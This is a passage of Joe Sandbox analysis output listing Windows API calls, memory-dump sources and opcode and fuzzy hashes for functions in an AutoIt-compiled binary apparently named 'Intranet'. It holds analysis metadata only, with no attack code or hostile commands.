                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,004F904D), ref: 004F94C2
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F94C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: a46188ecbe4c6c1e52d8ef1d7d7a022b598a5de53950834b1ce4c7135cc6d7df
                                                                            • Instruction ID: 414119e4ad49b0e847a357524ab960f21804795bb0ebaa35b74f48453dfc1440
                                                                            • Opcode Fuzzy Hash: a46188ecbe4c6c1e52d8ef1d7d7a022b598a5de53950834b1ce4c7135cc6d7df
                                                                            • Instruction Fuzzy Hash: 7911DC32504208EFDB108FA4CC19BBF7BA9FB61316F10801AEA81D7350C73A9D06EB64
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004F9200
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004F9207
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004F9216
                                                                            • CloseHandle.KERNEL32(00000004), ref: 004F9221
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F9250
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 004F9264
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: c98a59351742b6ade762b4488cb55fee5089980f5f945f464e62af791e7353b7
                                                                            • Instruction ID: a08fa76247532a7bdf2608991f695dab4249746f8c47c03271c3523d8e590b58
                                                                            • Opcode Fuzzy Hash: c98a59351742b6ade762b4488cb55fee5089980f5f945f464e62af791e7353b7
                                                                            • Instruction Fuzzy Hash: AB116D7250120EBBDF018F94DD49FEE7BA9EF08304F044065FE04A22A0C3759D65EB60
                                                                            APIs
                                                                            • GetDC.USER32(00000000,?,?,?,80004003), ref: 004FC34E
                                                                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 004FC35F
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 004FC366
                                                                            • ReleaseDC.USER32(00000000,00000000,?,?,80004003), ref: 004FC36E
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004FC385
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 004FC397
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: c5d2e6f76250f62c2e9b3d0a2c559d505d413992cd5a855999313af7a898d661
                                                                            • Instruction ID: b10833ed6e6feb8650bb8cd549f683905afa90aa2c35a4c0a35c295b2e573333
                                                                            • Opcode Fuzzy Hash: c5d2e6f76250f62c2e9b3d0a2c559d505d413992cd5a855999313af7a898d661
                                                                            • Instruction Fuzzy Hash: B5014475E00318BBEF109BA69D49A5EBFB8EB58751F004066FE04A7380D6749D14DFA1
                                                                            APIs
                                                                              • Part of subcall function 004A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                              • Part of subcall function 004A16CF: BeginPath.GDI32(?), ref: 004A174F
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000,00000000,00000000,000000FF,00000000,00000001,?,?,?,0052C498,00000000), ref: 0052C57C
                                                                            • LineTo.GDI32(00000000,00000003,?,?,0052C498,00000000), ref: 0052C590
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000,?,0052C498,00000000), ref: 0052C59E
                                                                            • LineTo.GDI32(00000000,00000000,?,?,0052C498,00000000), ref: 0052C5AE
                                                                            • EndPath.GDI32(00000000,00000000), ref: 0052C5BE
                                                                            • StrokePath.GDI32(00000000,00000000), ref: 0052C5CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 89625dcef781aefadfe9cedc72ff1b3527f920cd5b8e1a0d509a6b42c17ee890
                                                                            • Instruction ID: 68719196a00a8c7b653ec6d0316e216b5053e654df072a209fa7835c86f4cded
                                                                            • Opcode Fuzzy Hash: 89625dcef781aefadfe9cedc72ff1b3527f920cd5b8e1a0d509a6b42c17ee890
                                                                            • Instruction Fuzzy Hash: D4110C7600020CBFDF029F94DC88E9A7FADEF18354F048011F9185A2A1C771AE59EBA0
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,004AAB12), ref: 004C07EC
                                                                            • MapVirtualKeyW.USER32(00000010,00000000,?,?,?,004AAB12), ref: 004C07F4
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,004AAB12), ref: 004C07FF
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,004AAB12), ref: 004C080A
                                                                            • MapVirtualKeyW.USER32(00000011,00000000,?,?,?,004AAB12), ref: 004C0812
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,?,?,?,004AAB12), ref: 004C081A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 18593858879e9dd99b7aea5bbe77dd4d5d9b02bdb29a8e5b4433123843b8be47
                                                                            • Instruction ID: 4e870070674b676ab5becca35bb3c213f989b810c31c27b70002f4fcb8a362fb
                                                                            • Opcode Fuzzy Hash: 18593858879e9dd99b7aea5bbe77dd4d5d9b02bdb29a8e5b4433123843b8be47
                                                                            • Instruction Fuzzy Hash: 0D016CB09017597DE3008F5A8C85B52FFE8FF59354F00411BA15C47A41C7F5A868CBE5
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005059B4
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059CA
                                                                            • GetWindowThreadProcessId.USER32(?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059D9
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059E8
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059F2
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 3a0dfeaeda17cf80f7f1424f5819423a96b88b2b85e1834f2bf69c4397261e40
                                                                            • Instruction ID: 156e489cc6c80d4b7acb289a2cc4caff67d94a1775044f82d8eeae97ac261a4a
                                                                            • Opcode Fuzzy Hash: 3a0dfeaeda17cf80f7f1424f5819423a96b88b2b85e1834f2bf69c4397261e40
                                                                            • Instruction Fuzzy Hash: BEF03032241658BBE7215B929C0EEEF7F7CEFD6B11F000159FA05D1190E7A01A15E7B5
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 005077FE
                                                                            • EnterCriticalSection.KERNEL32(?,?,004AC2B6,?,?), ref: 0050780F
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,004AC2B6,?,?), ref: 0050781C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,004AC2B6,?,?), ref: 00507829
                                                                              • Part of subcall function 005071F0: CloseHandle.KERNEL32(00000000,?,00507836,?,004AC2B6,?,?), ref: 005071FA
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0050783C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,004AC2B6,?,?), ref: 00507843
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 4cae8792440a82e35c7ed50f6458c1c0ac0f7ec707e5ecd52f894b4d7d981015
                                                                            • Instruction ID: 34169245217e1570a2e89c1a3b4b3aa01e044e329091141f0ea9b2316dd4b75a
                                                                            • Opcode Fuzzy Hash: 4cae8792440a82e35c7ed50f6458c1c0ac0f7ec707e5ecd52f894b4d7d981015
                                                                            • Instruction Fuzzy Hash: 96F0E236444306ABD3112B64EC8CAEF3B39FF58302F142421F503911E1CBB5A809EB60
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004F9555
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 004F9561
                                                                            • CloseHandle.KERNEL32(?), ref: 004F956A
                                                                            • CloseHandle.KERNEL32(?), ref: 004F9572
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004F957B
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F9582
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: a0749a9f9a80a512b2e1a7c3cebfbe3cda7f79abea5988654adf2d5c920a9fef
                                                                            • Instruction ID: f21a5e9ece8e18d67d6cd582c6441838975bea1dc70b87b443b15cee2538833f
                                                                            • Opcode Fuzzy Hash: a0749a9f9a80a512b2e1a7c3cebfbe3cda7f79abea5988654adf2d5c920a9fef
                                                                            • Instruction Fuzzy Hash: 32E0E536004205BBDB011FE2EC1C95ABF39FF69B22B105620F215816B0CB32A468EB90
                                                                            APIs
                                                                            • #8.OLEAUT32(?,00530980), ref: 00518CFD
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00518E0C
                                                                            • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00518F84
                                                                              • Part of subcall function 00507B1D: #8.OLEAUT32(00000000,?,?,?,?,?,00519DBE,?,?), ref: 00507B5D
                                                                              • Part of subcall function 00507B1D: #10.WSOCK32(00000000,?,?,00519DBE,?,?), ref: 00507B66
                                                                              • Part of subcall function 00507B1D: #9.WSOCK32(00000000,?,00519DBE,?,?), ref: 00507B72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 3964851224-1221869570
                                                                            • Opcode ID: 48b6a45b2a1127d7d9c65c74d5d0dab874c6f2857875a9d3b58217f66b2653b2
                                                                            • Instruction ID: 9556304065ff94562ff24e00b901fd9e9b95f80f6b4c5caba5fb9557958cebb3
                                                                            • Opcode Fuzzy Hash: 48b6a45b2a1127d7d9c65c74d5d0dab874c6f2857875a9d3b58217f66b2653b2
                                                                            • Instruction Fuzzy Hash: 8F917C746043019FC710DF25C4849AABBE5FFD9318F04896EF88A8B3A1DB34E949CB52
                                                                            APIs
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • _memset.LIBCMT ref: 0050332E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0050335D
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00503410
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0050343E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: 59a3ee9d4f1f49c6d830f5aa24a927224380bf2c74638c126869a2ec1abd385b
                                                                            • Instruction ID: 192fbd80230a6bf4e76713b09ee291afe9705125829c7193e77a4ff0ef1fe71c
                                                                            • Opcode Fuzzy Hash: 59a3ee9d4f1f49c6d830f5aa24a927224380bf2c74638c126869a2ec1abd385b
                                                                            • Instruction Fuzzy Hash: 6B51CE356083019BDB169F29C849A6FBFECBB45314F040A2EF895971E1DB74CE44C756
                                                                            APIs
                                                                              • Part of subcall function 004B4A8C: _fseek.LIBCMT ref: 004B4AA4
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DE1
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DF4
                                                                            • _free.LIBCMT ref: 00509C5F
                                                                            • _free.LIBCMT ref: 00509C66
                                                                            • _free.LIBCMT ref: 00509CD1
                                                                              • Part of subcall function 004C2F85: HeapFree.KERNEL32(00000000,00000000,?,004C9C54,00000000,004C8D5D,004C59C3), ref: 004C2F99
                                                                              • Part of subcall function 004C2F85: GetLastError.KERNEL32(00000000,?,004C9C54,00000000,004C8D5D,004C59C3), ref: 004C2FAB
                                                                            • _free.LIBCMT ref: 00509CD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                            • API String ID: 1552873950-2806939583
                                                                            • Opcode ID: 6e8fbc33bba4cf3e19a2c7f45cef07a51b85885fc28cb68a3db4095dab673db9
                                                                            • Instruction ID: 8f1758927fd21cfda847d5016c1335321c2f4b6c82594da9abe270198920c34b
                                                                            • Opcode Fuzzy Hash: 6e8fbc33bba4cf3e19a2c7f45cef07a51b85885fc28cb68a3db4095dab673db9
                                                                            • Instruction Fuzzy Hash: 51512BB1D04219ABDF249F65DC45AAEBBB9FF88304F00049EF649A3281DB755E808F59
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00518A0E,?,00000000), ref: 0052DF71
                                                                            • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00518A0E,?,00000000,00000000), ref: 0052DFA7
                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0052DFB8
                                                                            • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00518A0E,?,00000000,00000000), ref: 0052E03A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: bb03212824d97d985b660130e8f879bd30489fc17ddaddd7f09f3dfe2a403d95
                                                                            • Instruction ID: bf6e8f86d14c268088fdaae66cc2ca83192826559102448f88326ab80fc629de
                                                                            • Opcode Fuzzy Hash: bb03212824d97d985b660130e8f879bd30489fc17ddaddd7f09f3dfe2a403d95
                                                                            • Instruction Fuzzy Hash: D841AF71600215DFCB14CF55E889AAABFA9FF46300F1480AAEC059F285D7F1DD45DBA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00502F67
                                                                            • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00502F83
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00502FC9
                                                                            • DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,00567890,?), ref: 00503012
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: fa2b6106f5cc1f4ba922ca0750de1ad596013bc7ed944375be85dd59fbdb270f
                                                                            • Instruction ID: 97748cd1b4db3d607f874dbe23438635c2f43141168875f3fef14a6a0dfd5cbd
                                                                            • Opcode Fuzzy Hash: fa2b6106f5cc1f4ba922ca0750de1ad596013bc7ed944375be85dd59fbdb270f
                                                                            • Instruction Fuzzy Hash: 5541BF712093429FD720DF25C899B5ABBE8BF84350F104A1EF565972D1D770EA05CB62
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0051DEAE
                                                                              • Part of subcall function 004B1462: _memmove.LIBCMT ref: 004B14B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower_memmove
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 3425801089-567219261
                                                                            • Opcode ID: a6fd593b630deaa105f635dc7d61ec0df02b32af435d8189d134f8f0478e1e64
                                                                            • Instruction ID: 076eda53042929592b1759d21c9b97fb320c8e087bf75272ef17e9139052175d
                                                                            • Opcode Fuzzy Hash: a6fd593b630deaa105f635dc7d61ec0df02b32af435d8189d134f8f0478e1e64
                                                                            • Instruction Fuzzy Hash: 0231A370900219EFDF00EF54C8519EEBBB4FF14314B10862EF826972E1DB35AA45CBA0
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9ACC
